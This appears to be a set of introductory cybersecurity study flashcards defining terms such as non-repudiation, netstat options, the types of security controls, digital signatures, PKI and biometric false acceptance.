The security principle of providing proof that a transaction occurred between identified parties. Repudiation occurs when one party in a transaction denies that the transaction took place. prevents one party from denying actions that they carried out.
ipconfig
The utility used to display TCP/IP addressing and domain name information in the Windows client operating systems.
netstat -e (command)
This displays Ethernet statistics such as the number of packets and bytes sent and received.
netstat command
This displays TCP and UDP connections. Allows you to view statistics for TCP/IP protocols on a system.
netstat -s (command)
This displays statistics per protocol, such as TCP, UDP, ICMP, IP, etc...
netstat -r (command)
This displays the route table.
False acceptance
This is when a biometric system incorrectly identifies an unauthorized user as an authorized user.
multifactor authentication (MFA)
To use more than one method to authenticate access to a computer, network, or other resource. e.g. combine the something you are factor with one or more other facts of authentication.
Alternate Power
Uninterruptible power supplies (UPSs) and power generators can provide power to key systems even if commercial power fails.
Technical Controls
Using technology that is carried out or managed by devices as a basis for controlling the access to and usage of sensitive data. e.g. Encryption, Antivirus software, Intrusion detection systems and intrusion prevention systems, firewalls and least privilege.
ping
a DOS command that tests connectivity and isolates hardware problems and any mismatched configurations
New Technology LAN Manager (NTLM)
a suite of protocols that provide authentication, integrity, and confidentiality within Windows systems. The successor to the authentication protocol in Microsoft LAN Manager (LANMAN), an older Microsoft product.
digital signature
an encrypted code that a person, website, or organization attaches to an electronic message to verify the identity of the message sender and that the message has not been modified. an encrypted hash of a message. The sender's private key encrypts the hash of the message to create the digital signature. The recipient decrypts the hash with the sender's public key. If successful, it provides authentication, non-repudiation, and integrity. Authentication identifies the sender. Integrity verifies the message has not been modified. Non-repudiation prevents senders from later denying they sent an email.
Detective Controls
controls designed to discover control problems that were not prevented. e.g. Log monitoring, trend analysis, security audit, video surveillance, motion detection.
Preventive Controls
controls that deter problems before they arise. e.g. Harding, Security Awareness training, security guards, change management, account disablement policy.
Corrective Controls
controls that identify and correct problems as well as correct and recover from the resulting errors. Reverse the impact of an incident or problem after is has occurred. e.g. IPS, Backups and system recovery.
Backups
copies of data created to ensure that if the original data is lost or corrupted operations can resume after restoring data from the backup. Without data backups, data is lost forever
Smart cards
credit card-sized cards that have an embedded microchip and a certificate.
Embedded certificate
holds a user's private key (only accessible to the user) and is matched with a public key (publicly available to others).
vulnerability
is a weakness. It can be a weakness in the hardware, the software, the configuration, or even the users operating system. a flaw or weakness in software or hardware, or a weakness in a process that a threat could exploit, resulting in a security breach. ▪ For example, lack of updates, default configurations, lack of malware and firewalls.
Retina scanners
scan the retina of one or both eyes and use the pattern of blood vessels at the back of the eye for recognition.
Public key infrastructure (PKI)
supports issuing and managing certificates
Confidentiality
the act of preventing data from disclosed to those who should not have access.
Obfuscation
the action of making something obscure, unclear, or unintelligible
Administrative Controls
use methods mandated by organizational policies or other guidelines. e.g. Risk assessment, vulnerability assessments, penetration tests, awareness training, configuration and change management, contingency planning.